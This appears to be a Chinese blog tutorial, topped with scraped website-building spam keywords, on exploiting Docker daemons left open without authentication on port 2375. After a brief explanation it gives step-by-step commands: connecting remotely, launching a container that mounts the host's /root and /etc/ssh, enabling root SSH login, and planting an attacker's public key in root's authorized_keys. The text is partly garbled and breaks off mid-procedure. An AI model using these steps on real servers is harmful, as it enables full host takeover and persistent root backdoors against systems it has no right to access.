衡水网站建设维护,邢台路桥建设总公司没有网站吗,自己免费做小程序,苏州网站建设n苏州网站建设公司目录Docker简述Docker 2375端口安全风险Docker命令连接利用声明#xff1a;本文仅供学习参考#xff0c;其中涉及的一切资源均来源于网络#xff0c;请勿用于任何非法行为#xff0c;否则您将自行承担相应后果#xff0c;本人不承担任何法律及连带责任。Docker简述
Docke…
目录Docker简述Docker 2375端口安全风险Docker命令连接利用声明本文仅供学习参考其中涉及的一切资源均来源于网络请勿用于任何非法行为否则您将自行承担相应后果本人不承担任何法律及连带责任。Docker简述
Docker是一个开源的应用容器引擎基于LXC的高级容器引擎源代码托管在Github 上基于go语言并遵从Apache2.0协议开源让开发者可以打包他们的应用以及依赖包到一个可移植的容器中然后发布到任何流行的 Linux 机器上也可以实现虚拟化。容器是完全使用沙箱机制相互之间不会有任何接口。
Docker 2375端口安全风险
为了实现集群管理Docker提供了远程管理接口。Docker Daemon作为守护进程运行在后台可以执行发送到管理接口上的Docker命令。正是因为错误地使用了Docker远端接口引起了安全漏洞因此在启动Docker Daemon时加入-H 0.0.0.0:2375Docker Daemon就可以接收远端的Docker Client发送的指令。Docker是把2375端口作为非加密端口暴露出来一般是用在测试环境中。此时没有任何加密和认证过程只要知道Docker主机的IP任何人都可以管理这台主机上的容器和镜像。 Docker命令连接
当$HOST主机以docker daemon -H0.0.0.0:2375方式启动daemon时导致2375端口对外网开放攻击者可以直接用Docker命令连接并管理docker daemon进行直接操作
docker -H tcp://$HOST:2375 info
利用
1、查看远程服务器上已有的镜像 2、远程启一个tomcat容器挂载宿主机的/root和/etc/ssh目录
docker -H tcp://192.168.10.171:2375 run –rm -it –entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log tomcat 在刚刚启动的容器中先看看 /tmp/ssh_etc/sshd_config (就是宿主机的/etc/ssh/sshd_config) 的PermitRootLogin字段。如果是no就改成yes允许root通过ssh登录
3、攻击机上生成一对公私钥ssh-keygen -t rsa -C “xxx123.com”
4、切换到容器将生成的公钥拷贝到容器的/tmp/root/.ssh/authorized_keys文件中
cat /tmp/root/.ssh/authorized_keys EOF
ssh-rsa AAA.... # 这里粘贴你刚刚在自己机器生成的id_rsa.pub
EOF# 如果/tmp/root/.ssh目录不存在就直接创建5、登录服务器